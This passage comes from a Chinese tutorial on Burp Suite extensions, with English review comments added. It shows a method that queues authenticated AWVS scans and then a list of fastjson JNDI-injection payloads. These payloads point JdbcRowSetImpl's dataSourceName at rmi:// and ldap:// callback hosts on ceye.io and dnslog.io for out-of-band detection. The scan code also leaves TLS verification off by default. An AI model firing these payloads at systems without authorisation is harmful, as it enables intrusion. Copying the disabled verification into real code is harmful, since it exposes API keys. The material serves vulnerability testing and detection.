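def startscan(self, tarUrl, reqHeaders):
    """Register ``tarUrl`` with AWVS and queue a scan for it.

    ``self.updateConfig(tarUrl, reqHeaders)`` is called first. When it returns
    a falsy target id, nothing is scheduled. Otherwise a scan is created by
    POSTing to ``self.awvsurl + "api/v1/scans"`` with ``self.awvsheaders``.

    Args:
        tarUrl: URL handed to ``updateConfig``.
        reqHeaders: request headers handed to ``updateConfig``
            (presumably stored with the target so the scanner can replay the
            logged-in session -- confirm in updateConfig).

    Returns:
        None in every case. Failures are printed instead of raised so the
        calling extension keeps running.
    """
    # Create (or look up) the target first; without an id there is nothing to scan.
    target_id = self.updateConfig(tarUrl, reqHeaders)
    if not target_id:
        return

    scan_request = {
        "target_id": target_id,
        # NOTE(review): hard-coded scan profile id -- presumably one of the
        # scanner's built-in profiles; confirm it matches the intended scan type.
        "profile_id": "11111111-1111-1111-1111-111111111112",
        "schedule": {"disable": False, "start_date": None, "time_sensitive": False},
    }

    # Certificate verification was unconditionally off. self.awvsheaders
    # presumably carries the AWVS API key (the page says url and apikey are
    # configured), so with verification off the key can be read by anyone able
    # to intercept the connection. The default stays False for compatibility
    # with self-signed installs; setting an optional ``awvsverify`` attribute
    # to True or to a CA bundle path turns verification on.
    verify_tls = getattr(self, "awvsverify", False)

    try:
        response = requests.post(
            self.awvsurl + "api/v1/scans",
            data=json.dumps(scan_request),
            headers=self.awvsheaders,
            timeout=30,
            verify=verify_tls,
        )
        # A rejected request (bad API key, unknown target, ...) used to pass
        # silently; report it so a missing scan is noticed.
        status = response.status_code
        if not 200 <= status < 300:
            print("AWVS scan request for target %s returned HTTP %s" % (target_id, status))
    except Exception as e:
        # Best effort: a scanner outage must not break the proxy extension.
        print(str(e))
    return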
4、展示效果
这里配置你的awvs url和apikey
这样的话,每个url都有两个扫描,一个主动扫描,一个做爬虫,把所有的流量导入xray
包含完整的用户身份信息的header头都在里面,可以实现登录后自动化扫描
5、代码地址
https://github.com/dongfangyuxiao/BurpExtend/blob/master/AWVS/burp_awvs.py
第六章:BurpSuite之应急响应或特定漏洞扫描案例
目的:
用于在突发0day的时候或想要扫描特定的漏洞的时候,可以编写burp插件用于特定漏洞的探测发现
例如,我们想要检测fastjson漏洞,首先定义一个fastjson的payload列表
# Out-of-band probe bodies used by the fastjson check. Each entry is a JSON
# document whose "@type" names com.sun.rowset.JdbcRowSetImpl and whose
# "dataSourceName" is an rmi:// or ldap:// URL on a ceye.io or dnslog.io
# subdomain.
# NOTE(review): the "m4mta5" and "dongfangyuxiao" labels look like the
# author's own callback-platform identifiers and are hard-coded. A deployment
# should point these at a callback domain it controls; otherwise any lookup
# triggered by a scanned host is reported to a third-party account, which
# discloses which of your hosts reacted.
# Detection: the same markers are usable on the defensive side -- request
# bodies that combine "@type" with JdbcRowSetImpl, and outbound DNS/RMI/LDAP
# traffic from application servers to callback domains such as these.
# NOTE(review): the page also shows `def fastjson(self, ...)`; if both live on
# the same class, this instance attribute shadows the method -- confirm and
# rename one of them.
self.fastjson = [
'{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://fastjson1.m4mta5.ceye.io","autoCommit":true}}',
'{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://fastjson2.m4mta5.ceye.io/Object","autoCommit":true}',
'{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://fastjson3.m4mta5.ceye.io","autoCommit":true}}}',
'{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://fastjson1.dongfangyuxiao.l.dnslog.io","autoCommit":true}}',
'{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://fastjson2.dongfangyuxiao.l.dnslog.io/Object","autoCommit":true}',
'{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://fastjson3.dongfangyuxiao.l.dnslog.io","autoCommit":true}}}'
]
我们写一个fastjson的漏洞检测类
def fastjson(self, url, heaers, host):